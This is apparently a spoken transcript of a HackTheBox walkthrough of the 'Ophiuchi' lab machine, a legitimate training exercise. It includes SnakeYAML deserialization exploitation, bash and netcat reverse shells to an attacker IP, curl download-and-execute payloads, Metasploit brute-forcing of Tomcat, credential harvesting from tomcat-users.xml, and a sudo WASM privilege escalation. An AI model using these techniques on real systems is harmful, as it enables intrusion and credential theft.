What's going on YouTube? This is Ipsak. I'm doing Ophiuchi from HackTheBox. At least I hope I pronounced that name correct. I have no idea what it means. But I do know how the box starts out, which is a Tomcat web application that is running Snake YAML, which is just a YAML parser that has a vulnerability in it. You can use it to get RCE on the server, and because it is a Tomcat application, you enumerate the Tomcat configuration to pull a username and password that is used to SSH into the box. Once on the box, you can enumerate the sudo rule and discover that you have access to run a Golang program as root. So you just do some exploitation around that and get root. So with that being said, let's just jump in. As always, I'm going to start with the nmap, so -sc for default scripts, sv enumerate versions, OA I'll put all formats, put in the nmap directory and call it Ophiuchi, and then the IP address of 10.10.10.227. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 8080, and its banner tells us it's Apache Tomcat version 9038, and the HTTP title is parse YAML. The very first place I'm going to start is just checking out searchsploit for Tomcat, because I know Tomcat had a lot of vulnerabilities, and just glancing at this, I don't really see anything for 9, at least 9 something. We have 9.0 right here. This is a information disclosure. We may want to take a look at this one. But again, I don't see too much for Tomcat version 9038. And I think that's relatively recent. If we Google first I have to go to Google. Maybe I don't. Google.com. And let's Google Apache Tomcat 9038 changelog. And I like adding changelogs because this tells us when it's released. And we see 9048. Can we edit the URL? We can't. Let's see, .38. .38. And this is 2020-09, so September 15th. So probably around the time this box was released is when they did Tomcat. It's not a extremely old version, so I'm not going to dig into Tomcat vulnerabilities. So let's just check out the page. So going to 10.10.10.227, and it was on port 8080. So we have to specify that, port 8080, and let's get rid of this HTTPS. And it's just an online YAML parser. So I'm going to just put some YAML thing. I think it's I forget what YAML stands for. YAML, yet another markup language, I think. YAML, yet another. Killed my Google search. There we go. YAML, human readable. I'm going to say yet another, language with yet another markup language. Okay. YAML ain't, I don't exactly know what it is. That's a long tangent, but I'm just going to do test:_true because this is valid YAML. You just put variable colon text. And we get, due to security reasons, this feature has been temporarily put on hold. We will soon fix the issue. So this is a Tomcat application, so I'm going to go to /manager. And I'm going to try logging in with the defaults of tomcat or tomcat secret. And it doesn't let me in. So what I'm going to do is some recon in the background while we continue poking at it. And I like using metasploit for this one in particular. You can use Hydra and things like that, but I found metasploit to be the most reliable. And you can set the brute force speed, which has been needed lately in Tomcat, because it does lock out. So I'm going to copy opt. Actually, let's do find opt seclist. And this is just, if you Google seclist GitHub, it's just a repository I use. I'm going to grep for Tomcat. And based upon these two, better default pass list is probably what I want to use. So let's copy that in my directory. And let's see, pwd. I'm going to copy this whole thing. We can do sudo msfdb run. We have database already started, but it is starting. I'm going to do search Tomcat, and at 19, I see Tomcat Manager login. So I'm going to do use 19, show options, And I'm going to set the user pass underscore file. So set user pass underscore file. And it looks like it already has my clipboard, which is annoying. So let's just type this again. So home, ipsec, HTB, Ophiuchi, and then was it Tomcat better default pass list? There we go. I'm going to unset the user file and unset pass file because we don't use those. I like using this user pass file because it makes it really easy to brute force combinations of usernames and passwords. If we didn't do that, then it would go through like every combination of user and password, which would just be a lot. So I'm going to edit this Tomcat file, and it does it based upon space, not colon. So let's do sed to swap out colon for space, and there we go. Again, if I didn't do this, it would like take this user root, go through every password. Take the user root again, go through every password. And I just want to go through specific things. Like, I don't know. There is some, but yeah. Like root demo is not a password, but demo may be a Tomcat one. So let's save that and go back to metasploit. And the next thing I want to do is set brute force speed. 0 to 5. 5 is the fastest. And I think Tomcat has some type of lockout by default. So I'm going to set the brute force speed to 1 because generally that avoids lockout. So there we go. We have to set our host to be 10.10.10.227 and then run. And this is going to take a while because you can see it just did one, and it's going to wait like 10 to 15 seconds before it goes on to do the next one. So while that goes, let's take a look at this. So if we send text, it tells us the feature is temporarily on hold. So what if we just put invalid YAML? Is it the same exact error message? It looks like it is. What if we do some type of special characters? So I did quote, and then we'll do a bunch of this, and we can also do single quote. And, ooh, 500 internal server error while scanning a quoted scalar. Not exactly sure what went on here, but this does show it is doing something. And we also have it doing something with snake YAML. So let's take a look at this. So snake YAML, we have to go Google snake YAML, and let's see, exploit. And we have a snake YAML deserialization exploit. I'm just scanning this for any type of payload we can use. Enter YAML. So here we go. We have a payload that looks like it's going to grab a file. So let's see, I think I copied that. Is that on my clipboard now? Let's go back to this. Nope. Let's see. Sometimes copying off websites is hard. I don't know why people design them that way. But there we go. So in snake YAML, anytime you do this exclamation, I guess you gain access to this Java scripting engine. And there is a URL class loader, and we can specify an IP address. I am 10.10.14.2, I believe. I'm looking right up here. I am 10.10.14.2. So the next thing we want to do is set up a netcat listener. So sudo nc lvnp 80, and we click parse. It is taking a while, which is a good sign because it's probably waiting on us. And we do confirm the server reached out to us. So we know there's probably some type of vulnerability here. If we go back to, let's see, this blog post, it's talking about it more. It links to a explanation that is now dead. We have this YAML payload off of GitHub, and it's telling us we use pretty much the same thing, give it a jar file, and tells us how to build this. So I'm going to git clone this. So git clone, paste this YAML payload, and it wants us to modify artsploit this. And instead of doing this, I guess this dig is probably getting some type of statistics on how many people run this exploit. But I'm going to exec a reverse shell. So let's do bash-c, bash-i, dev tcp 10.10.14.2, 9001, 0 at and 1, like that, and see if this works. So how do we compile this? Java-c source like that. Okay. Let's hope I have a Java compiler. Looks like I do. Where's that jar file? Let's do ls source, exploit. We got a Java and a class file. So we jar create verbose file, payload.jar, and specify source. Okay. Let's go back into YAML. Okay. It did a jar file, which is essentially just a zip, and now we have this. So I'm going to host a web server. So let's do Python 3. Actually, make dir dub, stay a little bit better organized. Let's copy this jar file in dub. And then we can do Python 3-m HTTP server on port 80. And then we need to nc lvnp 9001 ls dub yaml-payload.jar. Okay, so let's go here. We can do yaml-payload.jar parse. We get that error message again, but going back, we have it making a request to the jar, but no actual reverse shell. So let's go back into the YAML payload directory, and we can v source exploit awesome script engine.java. Double check this because there are a lot of like typing that we could make a typo. Looks good. And I'm going to change this payload up to be a bit simpler because all these like caret and all this stuff, the special characters that they may cause issues. So what I'm going to do is just do a simple curl. So assuming the box has curl, this should work. 10.10.14.2, we'll call the file shell.sh and pipe it over to bash. So that looks good. Save this. And then if this doesn't work, we'll try saving the payload to disk and then executing it because this little pipe character could also be considered a bad character. So let's do java-c, then jar-cvf, and we can copy this YAML payload to dub. And our metasploit's still going. Like I said, it takes a long time when you set that brute force speed to 0. So let's v shell.sh, and then we'll do bash-c, bash-i, dev tcp 10.10.14.2, 9001, 0 at and 1, like that. Start up our web server again. Click back, and then parse. Gets the file, it got shell.sh, but we don't have a reverse shell. So now what I'm thinking is maybe bash isn't installed and it's just got dash or something. Or maybe I just typoed this command. However, we know curl's on the box, so I'm just going to simply curl 10.10.14.2. It works. And then we're going to start up another web server. I'm just going to do Control-Shift-R to resend everything. And it got the shell.sh, but it didn't get it works. So my assumption of that pipe working and executing this is wrong because we should see a second curl to it works. So let's go and edit our payload to drop something to disk and then execute it. So going in our exploit v awesome.java, we can say curl 10.10.14.2 -o for out file dev shm shell.sh, and then we can do a second one of bash on this file. I'm just going to do sh because sh should be symlinked to bash. If not, it's probably symlinked to dash or something, but it should be fine. And let's do Java C, jar-c whatever, source, and let's copy it into the www directory directly so I don't have to, oh, I can't. Just do it here, and then manually copy that payload. So YAML payload to www. And in here, let's do that bash one-liner again. If I was a smart man, I would have saved the output to save me from typing, but it's muscle memory at this point. Bash-i, there we go. So let's stamp this web server. Control-Shift-R to refresh. We get shell.sh, but we don't get that reverse shell. So let's v, actually, yeah, let's just do it here. Curl 10.10.14.2. It works. Stand this up, refresh, and it's not doing a it works thing. So I'm not sure exactly what is going on with this payload. So at this point, let's see, sh. So it should have saved in dev shm shell.sh. We definitely get the file. Let's try a different payload. So I'm going to search for payload all the things, reverse shell. Google, let's just do reverse shell pentest monkey is what I actually wanted. And we'll try a reverse shell with netcat. Like this one. So let's try this. Paste this in, edit our IP. So 10.10.14.2, 9001. Java C, or yeah, I gotta go up one more directory. Jar cp YAML payload to a www directory. And if I see it doing a curl against shell.sh, I know I probably should change the file name or something because something's getting cached. We just get a request to YAML payload.jar and nothing on port 9001. So let's go back to our payload. So I'm going to find my VI. We just go, what is it? YAML payloads source. Okay, source artsploit. V source artsploit awesome script engine.java. So we have our payload right here, and we're doing this. I'm just going to try this curl again. So I'm going to switch it up. We know we can make a curl request. So curl 10.10.14.2/shell.sh-o. Instead of dev shm, I'm just going to use /temp. So shell.sh. And then we'll do a second request to execute it. There's a few things, because I think I just copied and pasted like this runtime. And what could have happened is it doesn't wait for the command to finish and just execute it too quickly. So I'm going to do this in two different payloads and try that. So we got this curl shell.sh. And then let's v shell.sh. I mean, that should be a fine one still. So we have to Java C, jar dash whatever, copy it to a www, and this should just download the file. And then before we actually run it, I'm going to prep a second one, and we're just going to execute it. So we'll just exec bash temp shell.sh. I could try sh, but I'm going to use bash this time, because I think bash is almost always on the system, at least Ubuntu. So let's see, Java C jar, and I'm just going to prep this up. I'm not going to hit enter, so we can send this, and this should get curl.sh, shell.sh, and now I copy the other one that should execute it. So we run it again. We sent this. We got it works. So we know doing it this way does work if we separate it out. Downside is no shell. So if I look at shell.sh, we did this curl, and then it did not do a shell. So let's try that netcat shell. We should have it right here. Is it on a different clipboard? It was. There we go. And then 10.10, 14.2, 9001. So unfortunately, we have to go back and let's see. CP YAML payload, this will be exec.jar. And then one last time, let's do a download. So instead of bash, we'll do curl 10.10.14.2 shell.sh-o temp shell. Java C. Okay. Should be fine. Let's copy this YAML payload to www. And then we can prep the exec.jar to www YAML payload. Start a web server. Send. We got shell.sh. Copy the execute one. Send it. And hey, we finally got a shell. The very first thing I'm going to do is lsla on bin and grep for bash. And there's our bash is linked to bash. Bin grep for sh, which sh user bin. So they did something with bash and broke it. I'm not sure exactly what, but yeah. So that's annoying. Python 3-c import pty pty.spawn bin bat. No. Bin sh. Control Z, STY, raw minus echo, FG, enter. LS. I don't have a full TTY. Oh well. There's probably something I could do, but I'm dancing around that bash carefully. Is there like user bin bash? Huh, there is. User bin bash. Watch me get dropped in restricted bash. Nope. Awesome. Normal TTY. Did not think that would work. Export term is equal to x term, so I can clear the screen. And let's see. We are the Tomcat user. The first thing I always like checking is just sudoers, and we do sudo-l, and it asks us for a password. I'm going to try the password and a password of Tomcat to see if anything works. And it doesn't look like we get anything. And before we go digging more into sudo, let's just find out if it's even interesting to us. So I'm going to do lsla on etc sudoers. And we can see its timestamp is December 28th, and the size is 845. I know the default size of sudoers is around like 750 for Ubuntu. If we just Google like default sudoers file, we can probably find that out. And again, I killed off my Google in the URL bar. And let's see, is there, here we go. So if I go to raw, let's just wget this real quick. Wget, and then lsla sudoers, it's 755. So we know the size doesn't match up, so it probably has an extra line or two. Based upon that, I'm guessing an extra line. And we can see the date is December 28th of 2020. Now, we don't know when the server was built yet. Generally, how I find that out is if I have access to Etsy SSH, I look at the date these keys were generated. So chances are the server was built October 11th, 2020. And the reason these keys don't change too often is because if they do change, you get that annoying, like, someone's trying to man in the middle of your SSH connection. So these keys generally don't rotate. And since the sudoers file was edited December 28th and the server was built October 11th, again, that indicates that something has changed in the sudoers file. So what I'm going to do is take a look at the Tomcat password. And we could go back to our metasploit where we brute forced, and we never gained access. If you weren't like skipping around, we were trying to get into this /manager. Now that we have shell on the box as Tomcat, we can just read the configuration file and get that password. And that's normally in opt. Then Tomcat, it's wherever the Tomcat is installed. Generally on Linux, it's in opt. It may also be like on user share, things like that, but just look for where Tomcat's installed. If you don't know, you can probably do psef. Let's see. Let's fix our TTY real quick. STTY-A, rows 35, columns 136. STTY, rows 34, 136. 34, calls 136. Now if I do a psef, that works. Tomcat. Let's see, do we see opt anywhere? Right here. Let's see, I wonder if I do psef /S, Tomcat, and with this we can go left and see the whole command line parameter, but we can see it is indeed installed in opt Tomcat. So if I didn't know what Tomcat was, this is where I pull that information. So we can go opt Tomcat. It also looks like it is my home. If I do env, look at home, it is also here. So two different ways you can find potentially where Tomcat's installed. Look at PS or look at your home directory. So I'm going to go into conf, and then the credentials is probably under tomcat-users.xml. And these use HTML comments, so we can see this is all commented out because it starts with that exclamation and 2 dashes and ends. So we just want to find where it's not commented. And this is a comment end, and this is uncommented, this is comment begin. So the password here is why there is a limit. So we can now test this with admin why there is a limit, and we get into Tomcat. Now, this doesn't really buy us anything other than persistence at this thing because we got code execution on YAML and it runs as Tomcat. So even if we upload a malicious Tomcat application, we'd still be getting the same user. I guess the benefit of this would be is if we're doing an engagement and they didn't like a repeat engagement and they patched YAML but didn't change the credentials to Tomcat, this is more of a persistence as we can now just deploy another application. So let's go check the sudoers with sudo-l, paste this password, and it is not the password for Tomcat. So what I'm going to do is cat etsy passwd and see if this is the password for anyone else on the box. I'm going to do sh. Let's do grep sh, and it's going to be bin bash, so that could be a weird restricted bash thing. Let's ssh. Admin at 10.10.10.227, accept this, put in the password, and it looks like this does work, and we're not in our bash. Let's see, I did bin and grep for bash. Oh, our bash was symlinked to bash, not the other way around. So there is no our bash on the system. Okay, that's fine. I'm going to try sudo-l, and we can see, indeed, this user does have a sudoers rule. So we can run user bin go, run, opt, wasm functions, index.go. So let's try this. let's just copy this whole line and then do sudo paste. And it looks like it errors. So index out of range with a length of 0. So let's take a look at what index.go is. Because even though this is Golang, Golang has two options. You can either execute and build full-out binaries, either elf, PE, whatever you want, PE being Windows, like exe, or you can just run scripts. So it's just running the script, and this behaves much like Python, where you just give it a Go file, and it will compile and run it. So it's looking like it is doing something with wasm, which is a WebAssembly thing, and it's pulling from this GitHub repo, but we got to find this main.wasm file. So looking at this, it's doing main.wasm, loading the instance, and then calling info, it looks like. And if it returns 1, it's going to say not ready to deploy, else it's going to say ready to deploy and execute deploy.sh. So the error is probably because we don't have main.wasm in our directory. So I'm going to do a find slash and then pipe it, or not pipe, but send error messages to dev null and grep for main.wasm to see where it is. And it looks like there's a directory opt wasm functions. And if we run it in this directory, let's go back to that sudoers rule. It says not ready to deploy. So let's go into backup and try running this and not ready to deploy again. So we have to somehow get this file to return 0 instead of 1. So wasm does have a decryptor. So I'm going to Google wasm decrypt. Again, I got to fix my Firefox so it goes back to Googling in that URL bar. Let's see. Is it in this? No. Let's see. WebAssembly binary kit. This looks like it. I'm going to download ubuntu.tar.gz and let's see if this does it. So let's go here. MV downloads not web.config. What was its name? WABT. tar-xjvf. Is it Z? Okay, xzvf. And let's go into this, go to bin, and we have, let's see, we have a wasm, so maybe wasm to T. I think, yeah, wasm to wat. I think this is text, and then we can do wat to wasm to convert back. Or maybe just wasm decompile. We got a lot of binaries in here, so what I'm going to do, let's just copy it over. NC-LVMP 9001 to main.wasm. And then, let's see, that is tomcat. Let's just cat main.wasm to NC1010.14.2, port 9001. And we're sending this over to our box. And we have main.wasm there. So let's go wasm to wat, main.wasm. And we have a file here. So let's do main.wat. And this doesn't really look too helpful. Let's see. Let's look at what index was. So a sudo rule, we want to grab this file. Exactly what is it doing out of here? It reads the wasm, and then it calls info. Oh, it's not equals to 1. For some reason, I was thinking it was equals, but it's not equals to 1. So we just say const is equal to 1. So now we're going to hit this, I think. So it was 0, and 0 doesn't equal 1, so it goes here. Yep, I'm right. It's just, I don't know why it's weird logic to me, but for some reason, it's just written weird. But yeah, So we do one, we go down to this else, and it executes deploy.sh. Okay, so that makes sense. So we change this to 1, and now we did wasm to wat, so we can do wat to wasm, and then main.wat. And let's see, I'm going to delete main.wasm because it didn't give me any output. So I don't know if it just erased it or not. So do this, lsla, so it created that main.wasm again. So I think that one is a good one. So how can we copy this back? I guess I can just SCP it. SCP main.wasm to admin at 10.10.10.227, I believe. We have to do colon. And then why there is a limit was the password, I believe. There we go. So if I go in home, we have main.wasm. So I'm going to make directory.ip. And we're going to move main.wasm in here. And we probably have to move almost everything else. So let's see. Maybe just deploy.sh. And we can actually copy /temp shell.sh. Do we still have that? ls/temp. Let's see. That's under... Is it under this? Let's see. Go back to our netcat, cd. Netcat's gone. We can just go into a www directory. Because we know whatever is in shell.sh works for a reverse shell. Let's see. I still have that listening, so I can just grab shell.sh. So wget 10.10.14.2/shell.sh. Move shell.sh to deploy.sh. nclvnp 9001. So let's run this sudo again. It says ready to deploy, and it deploys, and we are root. So that is awesome. And that is pretty much the box. I hope you guys enjoyed it. I do want to go back and we look at this metasploit thing. We never logged in. So let's edit the file we used. So let's do show options. And I'm going to use this default pass list. And we're just going to put the correct password and set brute force speed to its fastest and see if it works. I don't think it will. So I just want to kind of demo this piece. So let's go Ophiuchi v tomcat, put it here, admin, why there is a limit. So if I run this, it's going to go through a bunch and tell me everything is incorrect. So I'm going to speed up the video. So yeah. And we see never logs in. If I put this now at the top of the list, I don't think it's going to work because I'm probably locked out. So let's just run this again. 1, 2. So it's saying, yes, incorrect. So I'm going to revert the box, and we're going to run this with a low brute force and show it actually works. So brute force speed is set back to 1. I'm going to revert the box, and we will rerun it. The box has now been reverted. I'm going to run this again and probably just leave my computer idle for a little bit. I may not bother speeding it up because this does take a long time to run. If you've been paying attention to my clock in the top right, the previous one took like 2 minutes to run. I'm guessing this is going to take like 15 to 20 minutes. It's a lot slower, but again, locking yourself out of accounts is always bad because you see you have the correct password, but it just says incorrect. So hopefully at the end of this one, we'll see it does find the valid password after like 80 different attempts. I say 80 because I see 80 lines down there. So yep, gonna let this run. We'll see what happens. So after around 20 minutes, we finally hit the password. It is definitely very slow when we turn this brute force speed down to 1. However, when it was at 5, Metasploit just never got it because Tomcat timed us out. And that's one of the reasons why I like the Metasploit scanner. I know a lot of people probably like, oh my god, why using Metasploit? Why not use like Hydra, Endcrack, things like that? Because Metasploit made it super easy to set the speed. Additionally, if we wanted to, it supports proxies by default, so we don't have to do any like proxy chain hack to try to get the tool working. It just has a lot more options to do these types of things. Additionally, it sets verbose to true, so we see all the attempts in real time as it goes. If we set it to false, then this log and failed thing would go away, but that's essentially why I like using Metasploit, just because I find it generally works better than those like one-off tools. So hope you guys enjoyed the video, take care, and I will see you all next week.